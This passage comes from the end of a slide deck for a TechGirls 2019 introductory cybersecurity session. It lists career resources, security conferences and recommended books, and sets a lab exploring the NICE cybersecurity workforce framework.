* Certifications: [https://www.orionscache.com/2015/11/comparing-industry-certifications/](https://www.orionscache.com/2015/11/comparing-industry-certifications/)

???

.center[<img src="hacking_assets/img/nice_framework.png" style="width: 40%" /><br />
.small[https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-181.pdf]
]

* https://danielmiessler.com/blog/build-successful-infosec-career/
* https://tisiphone.net/2015/10/12/starting-an-infosec-career-the-megamix-chapters-1-3/

---

# Cybersecurity Conventions

.pull-left[
* Why go?
  * In-person training 
  * Attend talks to find out about the latest research, hacks, vulnerabilities, attacks, etc.
  * Network with other cybersecurity professionals
  * Give your own talks
* Examples:
  * BlackHat
  * DefCon
  * DerbyCon
  * ShmooCon
  * ThotCon
  * CactusCon
  * HouSecCon
]
.pull-right[<img src="hacking_assets/img/blackhat.png" style="width: 100%" /><br />
.small[https://www.blackhat.com]
]

---

# Book Suggestions

* Counter Hack Reloaded: A Step-by-Step Guide to Computer Attacks and Effective Defenses (2nd Edition)
* Rtfm: Red Team Field Manual
* Hacking: The Art of Exploitation, 2nd Edition
* Windows Internals, Part 1 (6th Edition) (Developer Reference)
* Social Engineering: The Science of Human Hacking
* Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
* The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers
* Cybersecurity: What Everyone Needs to Know
* Even more reading suggestions (nonfiction and fiction):  [https://www.defcon.org/html/links/book-list.html](https://www.defcon.org/html/links/book-list.html)

---
class: lab
#  LAB: Explore the NICE Framework

* Explore at least three different Category/Specialty Areas in the NICE Cybersecurity Framework [https://niccs.us-cert.gov/workforce-development/cyber-security-workforce-framework](https://niccs.us-cert.gov/workforce-development/cyber-security-workforce-framework)

.center[<img src="hacking_assets/img/niccs.png" style="width: 80%" /><br />.small[https://niccs.us-cert.gov/workforce-development/cyber-security-workforce-framework]
]

---
class: center, middle, break

# BREAK

---
class: center, middle, lab
#  LAB: OPEN DISCUSSION

---
class: center, middle, break

# THE END

# Safe travels, be cybersafe, and keep learning!

# Thank you for making TechGirls 2019 a wonderful success!

* giles@vt.edu
* kendallgiles.com